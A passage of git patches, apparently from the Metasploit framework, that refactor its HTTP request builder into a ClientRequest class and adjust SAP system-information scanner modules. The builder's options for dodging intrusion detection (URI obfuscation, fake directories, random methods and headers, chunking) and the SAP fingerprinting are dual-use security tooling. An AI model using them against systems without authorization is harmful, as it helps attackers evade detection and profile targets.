opts['cgi'] = true + opts['port'] = self.port - uri = set_cgi(c_cgi) - qstr = c_qs - pstr = c_body - - if (config['pad_get_params']) - 1.upto(config['pad_get_params_count'].to_i) do |i| - qstr << '&' if qstr.length > 0 - qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) - qstr << '=' - qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) - end + if opts['encode_params'] == true or opts['encode_params'].nil? + opts['encode_params'] = true + else + opts['encode_params'] = false end - c_varg.each_pair do |var,val| - qstr << '&' if qstr.length > 0 - qstr << (c_enc_p ? set_encode_uri(var) : var) - qstr << '=' - qstr << (c_enc_p ? set_encode_uri(val) : val) - end - - if (config['pad_post_params']) - 1.upto(config['pad_post_params_count'].to_i) do |i| - rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) - rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) - pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(rand_var) : rand_var) - pstr << '=' - pstr << (c_enc_p ? set_encode_uri(rand_val) : rand_val) - end - end - - c_varp.each_pair do |var,val| - pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(var) : var) - pstr << '=' - pstr << (c_enc_p ? set_encode_uri(val) : val) - end - - req = '' - req << set_method(c_meth) - req << set_method_uri_spacer() - req << set_uri_prepend() - req << (c_enc ? set_encode_uri(uri):uri) - - if (qstr.length > 0) - req << '?' - req << qstr - end - - req << set_path_info(c_path) - req << set_uri_append() - req << set_uri_version_spacer() - req << set_version(c_prot, c_vers) - req << set_host_header(c_host) - req << set_agent_header(c_ag) - - if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end - end - - req << set_cookie_header(c_cook) - req << set_connection_header(c_conn) - req << set_extra_headers(c_head) - - req << set_content_type_header(c_type) - req << set_content_len_header(pstr.length) - req << set_chunked_header() - req << set_raw_headers(c_rawh) - req << set_body(pstr) - - request = Request.new - request.parse(req) - request.options = opts - - request + req = ClientRequest.new(opts,self.config) end # @@ -855,284 +786,6 @@ class Client pipeline end - # - # Return the encoded URI - # ['none','hex-normal', 'hex-all', 'u-normal', 'u-all'] - def set_encode_uri(uri) - a = uri - self.config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, self.config['uri_encode_mode']) - } - return a - end - - # - # Return the encoded query string - # - def set_encode_qs(qs) - a = qs - self.config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, self.config['uri_encode_mode']) - } - return a - end - - # - # Return the uri - # - def set_uri(uri) - - if (self.config['uri_dir_self_reference']) - uri.gsub!('/', '/./') - end - - if (self.config['uri_dir_fake_relative']) - buf = "" - uri.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri = buf - end - - if (self.config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << ((self.port == 80) ? "" : ":#{self.port}") - url << uri - url - else - uri - end - end - - # - # Return the cgi - # - def set_cgi(uri) - - if (self.config['uri_dir_self_reference']) - uri.gsub!('/', '/./') - end - - if (self.config['uri_dir_fake_relative']) - buf = "" - uri.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri = buf - end - - url = uri - - if (self.config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << (self.port == 80) ? "" : ":#{self.port}" - url << uri - end - - url - end - - # - # Return the HTTP method string - # - def set_method(method) - ret = method - - if (self.config['method_random_valid']) - ret = ['GET', 'POST', 'HEAD'][rand(3)] - end - - if (self.config['method_random_invalid']) - ret = Rex::Text.rand_text_alpha(rand(20)+1) - end - - if (self.config['method_random_case']) - ret = Rex::Text.to_rand_case(ret) - end - - ret - end - - # - # Return the HTTP version string - # - def set_version(protocol, version) - ret = protocol + "/" + version - - if (self.config['version_random_valid']) - ret = protocol + "/" + ['1.0', '1.1'][rand(2)] - end - - if (self.config['version_random_invalid']) - ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) - end - - if (self.config['version_random_case']) - ret = Rex::Text.to_rand_case(ret) - end - - ret << "\r\n" - end - - # - # Return the HTTP seperator and body string - # - def set_body(data) - return "\r\n" + data if self.config['chunked_size'] == 0 - str = data.dup - chunked = '' - while str.size > 0 - chunk = str.slice!(0,rand(self.config['chunked_size']) + 1) - chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" - end - "\r\n" + chunked + "0\r\n\r\n" - end - - # - # Return the HTTP path info - # TODO: - # * Encode path information - def set_path_info(path) - path ? path : '' - end - - # - # Return the spacing between the method and uri - # - def set_method_uri_spacer - len = self.config['pad_method_uri_count'].to_i - set = " " - buf = "" - - case self.config['pad_method_uri_type'] - when 'tab' - set = "\t" - when 'apache' - set = "\t \x0b\x0c\x0d" - end - - while(buf.length < len) - buf << set[ rand(set.length) ] - end - - return buf - end - - # - # Return the spacing between the uri and the version - # - def set_uri_version_spacer - len = self.config['pad_uri_version_count'].to_i - set = " " - buf = "" - - case self.config['pad_uri_version_type'] - when 'tab' - set = "\t" - when 'apache' - set = "\t \x0b\x0c\x0d" - end - - while(buf.length < len) - buf << set[ rand(set.length) ] - end - - return buf - end - - # - # Return the padding to place before the uri - # - def set_uri_prepend - prefix = "" - - if (self.config['uri_fake_params_start']) - prefix << '/%3fa=b/../' - end - - if (self.config['uri_fake_end']) - prefix << '/%20HTTP/1.0/../../' - end - - prefix - end - - # - # Return the padding to place before the uri - # - def set_uri_append - # TODO: - # * Support different padding types - "" - end - - # - # Return the HTTP Host header - # - def set_host_header(host=nil) - return "" if self.config['uri_full_url'] - host ||= self.config['vhost'] - - # IPv6 addresses must be placed in brackets - if Rex::Socket.is_ipv6?(host) - host = "[#{host}]" - end - - # The port should be appended if non-standard - if not [80,443].include?(self.port) - host = host + ":#{port}" - end - - set_formatted_header("Host", host) - end - - # - # Return the HTTP agent header - # - def set_agent_header(agent) - agent ? set_formatted_header("User-Agent", agent) : "" - end - - # - # Return the HTTP cookie header - # - def set_cookie_header(cookie) - cookie ? set_formatted_header("Cookie", cookie) : "" - end - - # - # Return the HTTP connection header - # - def set_connection_header(conn) - conn ? set_formatted_header("Connection", conn) : "" - end - - # - # Return the content type header - # - def set_content_type_header(ctype) - set_formatted_header("Content-Type", ctype) - end - - # - # Return the content length header - def set_content_len_header(clen) - return "" if self.config['chunked_size'] > 0 - set_formatted_header("Content-Length", clen) - end - # # Return the Authorization basic-auth header # @@ -1140,53 +793,6 @@ class Client auth ? set_formatted_header("Authorization", "Basic " + Rex::Text.encode_base64(auth)) : "" end - # - # Return a string of formatted extra headers - # - def set_extra_headers(headers) - buf = '' - - if (self.config['pad_fake_headers']) - 1.upto(self.config['pad_fake_headers_count'].to_i) do |i| - buf << set_formatted_header( - Rex::Text.rand_text_alphanumeric(rand(32)+1), - Rex::Text.rand_text_alphanumeric(rand(32)+1) - ) - end - end - - headers.each_pair do |var,val| - buf << set_formatted_header(var, val) - end - - buf - end - - def set_chunked_header() - return "" if self.config['chunked_size'] == 0 - set_formatted_header('Transfer-Encoding', 'chunked') - end - - # - # Return a string of raw header data - # - def set_raw_headers(data) - data - end - - # - # Return a formatted header string - # - def set_formatted_header(var, val) - if (self.config['header_folding']) - "#{var}:\r\n\t#{val}\r\n" - else - "#{var}: #{val}\r\n" - end - end - - - # # The client request configuration # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb new file mode 100644 index 0000000000..cb76327f2b --- /dev/null +++ b/lib/rex/proto/http/client_request.rb @@ -0,0 +1,454 @@ +# -*- coding: binary -*- +require 'uri' +require 'rex/proto/http' + +module Rex +module Proto +module Http + +class ClientRequest + + attr_accessor :authorization + attr_accessor :cgi + attr_accessor :config + attr_accessor :connection + attr_accessor :content_type + attr_accessor :cookie + attr_accessor :data + attr_accessor :encode + attr_accessor :encode_params + attr_accessor :headers + attr_accessor :host + attr_accessor :method + attr_accessor :path + attr_accessor :port + attr_accessor :protocol + attr_accessor :query + attr_accessor :raw_headers + attr_accessor :uri + attr_accessor :user_agent + attr_accessor :vars_get + attr_accessor :vars_post + attr_accessor :version + + def initialize(opts={}, client_config) + @cgi = opts['cgi'] + @config = client_config + @connection = opts['connection'] + @content_type = opts['ctype'] + @cookie = opts['cookie'] + @data = opts['data'] + @encode = opts['encode'] + @encode_params = opts['encode_params'] + @headers = opts['headers'] + @host = opts['vhost'] + @method = opts['method'] + @path = opts['path_info'] + @port = opts['port'] + @protocol = opts['proto'] + @query = opts['query'] + @raw_headers = opts['raw_headers'] + @uri = opts['uri'] + @user_agent = opts['agent'] + @vars_get = opts['vars_get'] + @vars_post = opts['vars_post'] + @version = opts['version'] + end + + def to_s + + # Start GET query string + qstr = query + + # Start POST data string + pstr = data + + if cgi == true + uri_str= set_cgi + + if (config['pad_get_params']) + 1.upto(config['pad_get_params_count'].to_i) do |i| + qstr << '&' if qstr.length > 0 + qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + qstr << '=' + qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + end + end + + vars_get.each_pair do |var,val| + qstr << '&' if qstr.length > 0 + qstr << (encode_params ? set_encode_uri(var) : var) + qstr << '=' + qstr << (encode_params ? set_encode_uri(val) : val) + end + + if (config['pad_post_params']) + 1.upto(config['pad_post_params_count'].to_i) do |i| + rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) + rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) + pstr << '&' if pstr.length > 0 + pstr << (encode_params ? set_encode_uri(rand_var) : rand_var) + pstr << '=' + pstr << (encode_params ? set_encode_uri(rand_val) : rand_val) + end + end + + vars_post.each_pair do |var,val| + pstr << '&' if pstr.length > 0 + pstr << (encode_params ? set_encode_uri(var) : var) + pstr << '=' + pstr << (encode_params ? set_encode_uri(val) : val) + end + else + uri_str = set_uri + if encode + qstr = set_encode_uri(qstr) + end + end + + req = '' + req << set_method + req << set_method_uri_spacer() + req << set_uri_prepend() + + if encode + req << set_encode_uri(uri_str) + else + req << uri_str + end + + + if (qstr.length > 0) + req << '?' + req << qstr + end + + req << set_path_info + req << set_uri_append() + req << set_uri_version_spacer() + req << set_version + req << set_host_header + + # If an explicit User-Agent header is set, then use that instead of the value of user_agent + unless headers.keys.map{|x| x.downcase }.include?('user-agent') + req << set_agent_header + end + + if authorization + req << set_auth_header + end + + req << set_cookie_header + req << set_connection_header + req << set_extra_headers + + req << set_content_type_header + req << set_content_len_header(pstr.length) + req << set_chunked_header() + req << raw_headers + req << set_body(pstr) + end + + protected + + def set_auth_header + "Authorization: " + authorization + end + + def set_uri + if (config['uri_dir_self_reference']) + uri.gsub!('/', '/./') + end + + if (config['uri_dir_fake_relative']) + buf = "" + uri.split('/').each do |part| + cnt = rand(8)+2 + 1.upto(cnt) { |idx| + buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) + } + buf << ("/.." * cnt) + buf << "/" + part + end + uri = buf + end + + if (config['uri_full_url']) + url = self.ssl ? "https" : "http" + url << self.config['vhost'] + url << ((self.port == 80) ? "" : ":#{self.port}") + url << uri + url + else + uri + end + end + + def set_cgi + uri_str = uri + if (config['uri_dir_self_reference']) + uri_str.gsub!('/', '/./') + end + + if (config['uri_dir_fake_relative']) + buf = "" + uri_str.split('/').each do |part| + cnt = rand(8)+2 + 1.upto(cnt) { |idx| + buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) + } + buf << ("/.." * cnt) + buf << "/" + part + end + uri_str = buf + end + + url = uri_str + + if (config['uri_full_url']) + url = self.ssl ? "https" : "http" + url << self.config['vhost'] + url << (self.port == 80) ? "" : ":#{self.port}" + url << uri_str + end + + url + end + + def set_encode_uri(str) + a = str + config['uri_encode_count'].times { + a = Rex::Text.uri_encode(a, config['uri_encode_mode']) + } + return a + end + + def set_method + ret = method + + if (config['method_random_valid']) + ret = ['GET', 'POST', 'HEAD'][rand(3)] + end + + if (config['method_random_invalid']) + ret = Rex::Text.rand_text_alpha(rand(20)+1) + end + + if (config['method_random_case']) + ret = Rex::Text.to_rand_case(ret) + end + + ret + end + + def set_method_uri_spacer + len = config['pad_method_uri_count'].to_i + set = " " + buf = "" + + case config['pad_method_uri_type'] + when 'tab' + set = "\t" + when 'apache' + set = "\t \x0b\x0c\x0d" + end + + while(buf.length < len) + buf << set[ rand(set.length) ] + end + + return buf + end + + # + # Return the padding to place before the uri + # + def set_uri_prepend + prefix = "" + + if (config['uri_fake_params_start']) + prefix << '/%3fa=b/../' + end + + if (config['uri_fake_end']) + prefix << '/%20HTTP/1.0/../../' + end + + prefix + end + + # + # Return the HTTP path info + # TODO: + # * Encode path information + def set_path_info + path ? path : '' + end + + # + # Return the padding to place before the uri + # + def set_uri_append + # TODO: + # * Support different padding types + "" + end + + # + # Return the spacing between the uri and the version + # + def set_uri_version_spacer + len = config['pad_uri_version_count'].to_i + set = " " + buf = "" + + case config['pad_uri_version_type'] + when 'tab' + set = "\t" + when 'apache' + set = "\t \x0b\x0c\x0d" + end + + while(buf.length < len) + buf << set[ rand(set.length) ] + end + + return buf + end + + # + # Return the HTTP version string + # + def set_version + ret = protocol + "/" + version + + if (config['version_random_valid']) + ret = protocol + "/" + ['1.0', '1.1'][rand(2)] + end + + if (config['version_random_invalid']) + ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) + end + + if (config['version_random_case']) + ret = Rex::Text.to_rand_case(ret) + end + + ret << "\r\n" + end + + # + # Return the HTTP Host header + # + def set_host_header + return "" if config['uri_full_url'] + host ||= config['vhost'] + + # IPv6 addresses must be placed in brackets + if Rex::Socket.is_ipv6?(host) + host = "[#{host}]" + end + + # The port should be appended if non-standard + if not [80,443].include?(port) + host = host + ":#{port}" + end + + set_formatted_header("Host", host) + end + + # + # Return the HTTP agent header + # + def set_agent_header + user_agent ? set_formatted_header("User-Agent", user_agent) : "" + end + + # + # Return a formatted header string + # + def set_formatted_header(var, val) + if (self.config['header_folding']) + "#{var}:\r\n\t#{val}\r\n" + else + "#{var}: #{val}\r\n" + end + end + + # + # Return the HTTP cookie header + # + def set_cookie_header + cookie ? set_formatted_header("Cookie", cookie) : "" + end + + # + # Return the HTTP connection header + # + def set_connection_header + connection ? set_formatted_header("Connection", connection) : "" + end + + # + # Return the content type header + # + def set_content_type_header + set_formatted_header("Content-Type", content_type) + end + + # + # Return the content length header + def set_content_len_header(clen) + return "" if config['chunked_size'] > 0 + set_formatted_header("Content-Length", clen) + end + + # + # Return a string of formatted extra headers + # + def set_extra_headers + buf = '' + + if (config['pad_fake_headers']) + 1.upto(config['pad_fake_headers_count'].to_i) do |i| + buf << set_formatted_header( + Rex::Text.rand_text_alphanumeric(rand(32)+1), + Rex::Text.rand_text_alphanumeric(rand(32)+1) + ) + end + end + + headers.each_pair do |var,val| + buf << set_formatted_header(var, val) + end + + buf + end + + def set_chunked_header + return "" if config['chunked_size'] == 0 + set_formatted_header('Transfer-Encoding', 'chunked') + end + + # + # Return the HTTP seperator and body string + # + def set_body(bdata) + return "\r\n" + bdata if config['chunked_size'] == 0 + str = bdata.dup + chunked = '' + while str.size > 0 + chunk = str.slice!(0,rand(config['chunked_size']) + 1) + chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" + end + "\r\n" + chunked + "0\r\n\r\n" + end + + +end + + + +end +end +end \ No newline at end of file From 87d9af585eada1536c65fdb7dc53759fb687f6a3 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Sun, 17 Feb 2013 21:35:19 -0600 Subject: [PATCH 020/139] fix request_raw --- lib/rex/proto/http/client.rb | 79 ++++++++-------------------- lib/rex/proto/http/client_request.rb | 15 ++++-- 2 files changed, 33 insertions(+), 61 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 690cd58f4d..0244a9eb3e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,8 +8,6 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' -require 'pry' - module Rex module Proto module Http @@ -171,62 +169,27 @@ class Client # # @return [Request] def request_raw(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] - c_enc = opts['encode'] || false - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] || self.hostname - c_meth = opts['method'] || 'GET' - c_prot = opts['proto'] || 'HTTP' - c_qs = opts['query'] - c_rawh = opts['raw_headers']|| config['raw_headers'] || '' - c_uri = opts['uri'] || '/' - c_vers = opts['version'] || config['version'] || '1.1' + opts['agent'] ||= config['agent'] + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' + opts['cgi'] = false + opts['port'] = self.port - # An agent parameter was specified, but so was a header, prefer the header - if c_ag and c_head.keys.map{|x| x.downcase }.include?('user-agent') - c_ag = nil + if opts['basic_auth'] and not opts['authorization'] + opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - uri = set_uri(c_uri) - - req = '' - req << set_method(c_meth) - req << set_method_uri_spacer() - req << set_uri_prepend() - req << (c_enc ? set_encode_uri(uri) : uri) - - if (c_qs) - req << '?' - req << (c_enc ? set_encode_qs(c_qs) : c_qs) - end - - req << set_uri_append() - req << set_uri_version_spacer() - req << set_version(c_prot, c_vers) - req << set_host_header(c_host) - req << set_agent_header(c_ag) - - if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end - end - - req << set_cookie_header(c_cook) - req << set_connection_header(c_conn) - req << set_extra_headers(c_head) - req << set_raw_headers(c_rawh) - req << set_body(c_body) - - request = Request.new - request.parse(req) - request.options = opts - - request + req = ClientRequest.new(opts,self.config) end @@ -267,6 +230,10 @@ class Client opts['encode_params'] = false end + if opts['basic_auth'] and not opts['authorization'] + opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) + end + req = ClientRequest.new(opts,self.config) end @@ -322,7 +289,7 @@ class Client def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? - res = send_auth(res, req.options, t, persist) + res = send_auth(res, req.opts, t, persist) end res end diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index cb76327f2b..c24d9a8c4a 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -2,6 +2,7 @@ require 'uri' require 'rex/proto/http' + module Rex module Proto module Http @@ -31,6 +32,8 @@ class ClientRequest attr_accessor :vars_post attr_accessor :version + attr_reader :opts + def initialize(opts={}, client_config) @cgi = opts['cgi'] @config = client_config @@ -53,6 +56,7 @@ class ClientRequest @vars_get = opts['vars_get'] @vars_post = opts['vars_post'] @version = opts['version'] + @opts = opts end def to_s @@ -156,13 +160,14 @@ class ClientRequest end def set_uri + uri_str = uri if (config['uri_dir_self_reference']) - uri.gsub!('/', '/./') + uri_str.gsub!('/', '/./') end if (config['uri_dir_fake_relative']) buf = "" - uri.split('/').each do |part| + uri_str.split('/').each do |part| cnt = rand(8)+2 1.upto(cnt) { |idx| buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) @@ -170,17 +175,17 @@ class ClientRequest buf << ("/.." * cnt) buf << "/" + part end - uri = buf + uri_str = buf end if (config['uri_full_url']) url = self.ssl ? "https" : "http" url << self.config['vhost'] url << ((self.port == 80) ? "" : ":#{self.port}") - url << uri + url << uri_str url else - uri + uri_str end end From 4170a85d8adb8384d467176dd7a1d935455205aa Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 19 Feb 2013 09:42:13 +0100 Subject: [PATCH 021/139] Added logic to only report when value is present --- .../scanner/sap/sap_icf_rfc_system_info.rb | 38 +++++++++---------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb index dd47aaa5c7..602d270cb6 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb @@ -126,6 +126,7 @@ class Metasploit4 < Msf::Auxiliary # output table print(saptbl.to_s) + # report notes report_note( :host => ip, :proto => 'tcp', @@ -133,7 +134,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'sap.version.release', :data => "Release Status of SAP System: #{rfcsaprl}" - ) + ) if not rfcsaprl.empty? report_note( :host => ip, @@ -142,7 +143,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'sap.version.rfc_log', :data => "RFC Log Version: #{rfcproto}" - ) + ) if not rfcproto.empty? report_note( :host => ip, @@ -151,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'sap.version.kernel', :data => "Kernel Release: #{rfckernrl}" - ) + ) if not rfckernrl.empty? report_note( :host => ip, @@ -160,7 +161,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'system.os', :data => "Operating System: #{rfcopsys}" - ) + ) if not rfcopsys.empty? report_note( :host => ip, @@ -168,7 +169,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.db.hostname', :data => "Database Host: #{rfcdbhost}" - ) + ) if not rfcdbhost.empty? report_note( :host => ip, @@ -176,9 +177,9 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.db_system', :data => "Central Database System: #{rfcdbsys}" - ) + ) if not rfcdbsys.empty? - if rfcinttyp == 'LIT' + if rfcinttyp == 'LIT' report_note( :host => ip, :proto => 'tcp', @@ -186,7 +187,7 @@ class Metasploit4 < Msf::Auxiliary :type => 'system.endianness', :data => "Integer Format: Little Endian" ) - else + elsif not rfcinttyp.empty? report_note( :host => ip, :proto => 'tcp', @@ -202,7 +203,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.hostname', :data => "Hostname: #{rfchost}" - ) + ) if not rfchost.empty? if rfcflotyp == 'IE3' report_note( @@ -212,7 +213,7 @@ class Metasploit4 < Msf::Auxiliary :type => 'system.float_type', :data => "Float Type Format: IEEE" ) - else + elsif not rfcflotyp.empty? report_note( :host => ip, :proto => 'tcp', @@ -228,7 +229,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.ip.v4', :data => "IPv4 Address: #{rfcipaddr}" - ) + ) if not rfcipaddr.empty? report_note( :host => ip, @@ -236,7 +237,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.ip.v6', :data => "IPv6 Address: #{rfcipv6addr}" - ) + ) if not rfcipv6addr.empty? report_note( :host => ip, @@ -244,7 +245,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.instance', :data => "System ID: #{rfcsysid}" - ) + ) if not rfcsysid.empty? report_note( :host => ip, @@ -252,7 +253,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.rfc.destination', :data => "RFC Destination: #{rfcdest}" - ) + ) if not rfcdest.empty? report_note( :host => ip, @@ -260,7 +261,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.timezone', :data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" - ) + ) if not rfctzone.empty? report_note( :host => ip, @@ -268,7 +269,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.charset', :data => "Character Set: #{rfcchartyp}" - ) + ) if not rfcchartyp.empty? report_note( :host => ip, @@ -276,8 +277,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.daylight_saving_time', :data => "Daylight Saving Time: #{rfcdayst}" - ) - + ) if not rfcdayst.empty? report_note( :host => ip, @@ -285,6 +285,6 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.machine_id', :data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}" - ) + ) if not rfcmach.empty? end end \ No newline at end of file From d4011227e3cc98e2efec5d462be815451cbd1753 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 19 Feb 2013 09:43:36 +0100 Subject: [PATCH 022/139] Made suitable changes to original module also (only report on non empty response) --- .../scanner/sap/sap_soap_rfc_system_info.rb | 39 ++++++++++--------- 1 file changed, 20 insertions(+), 19 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 80c4168c0f..7676ad2611 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -145,8 +145,10 @@ class Metasploit4 < Msf::Auxiliary saptbl << [ "Character Set", rfcchartyp ] saptbl << [ "Daylight Saving Time", rfcdayst ] saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")] + # output table print(saptbl.to_s) + # report notes report_note( :host => ip, :proto => 'tcp', @@ -154,7 +156,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'sap.version.release', :data => "Release Status of SAP System: #{rfcsaprl}" - ) + ) if not rfcsaprl.empty? report_note( :host => ip, @@ -163,7 +165,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'sap.version.rfc_log', :data => "RFC Log Version: #{rfcproto}" - ) + ) if not rfcproto.empty? report_note( :host => ip, @@ -172,7 +174,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'sap.version.kernel', :data => "Kernel Release: #{rfckernrl}" - ) + ) if not rfckernrl.empty? report_note( :host => ip, @@ -181,7 +183,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'system.os', :data => "Operating System: #{rfcopsys}" - ) + ) if not rfcopsys.empty? report_note( :host => ip, @@ -189,7 +191,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.db.hostname', :data => "Database Host: #{rfcdbhost}" - ) + ) if not rfcdbhost.empty? report_note( :host => ip, @@ -197,9 +199,9 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.db_system', :data => "Central Database System: #{rfcdbsys}" - ) + ) if not rfcdbsys.empty? - if rfcinttyp == 'LIT' + if rfcinttyp == 'LIT' report_note( :host => ip, :proto => 'tcp', @@ -207,7 +209,7 @@ class Metasploit4 < Msf::Auxiliary :type => 'system.endianness', :data => "Integer Format: Little Endian" ) - else + elsif not rfcinttyp.empty? report_note( :host => ip, :proto => 'tcp', @@ -223,7 +225,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.hostname', :data => "Hostname: #{rfchost}" - ) + ) if not rfchost.empty? if rfcflotyp == 'IE3' report_note( @@ -233,7 +235,7 @@ class Metasploit4 < Msf::Auxiliary :type => 'system.float_type', :data => "Float Type Format: IEEE" ) - else + elsif not rfcflotyp.empty? report_note( :host => ip, :proto => 'tcp', @@ -249,7 +251,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.ip.v4', :data => "IPv4 Address: #{rfcipaddr}" - ) + ) if not rfcipaddr.empty? report_note( :host => ip, @@ -257,7 +259,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.ip.v6', :data => "IPv6 Address: #{rfcipv6addr}" - ) + ) if not rfcipv6addr.empty? report_note( :host => ip, @@ -265,7 +267,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.instance', :data => "System ID: #{rfcsysid}" - ) + ) if not rfcsysid.empty? report_note( :host => ip, @@ -273,7 +275,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.rfc.destination', :data => "RFC Destination: #{rfcdest}" - ) + ) if not rfcdest.empty? report_note( :host => ip, @@ -281,7 +283,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.timezone', :data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" - ) + ) if not rfctzone.empty? report_note( :host => ip, @@ -289,7 +291,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.charset', :data => "Character Set: #{rfcchartyp}" - ) + ) if not rfcchartyp.empty? report_note( :host => ip, @@ -297,8 +299,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.daylight_saving_time', :data => "Daylight Saving Time: #{rfcdayst}" - ) - + ) if not rfcdayst.empty? report_note( :host => ip, @@ -306,6 +307,6 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.machine_id', :data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}" - ) + ) if not rfcmach.empty? end end From a75bae927d59984fb6c980fbb634eb1ce825bd54 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 19 Feb 2013 11:12:12 +0100 Subject: [PATCH 023/139] Replaced report_note and table output with single function Added proposed extract data function (HDM) --- 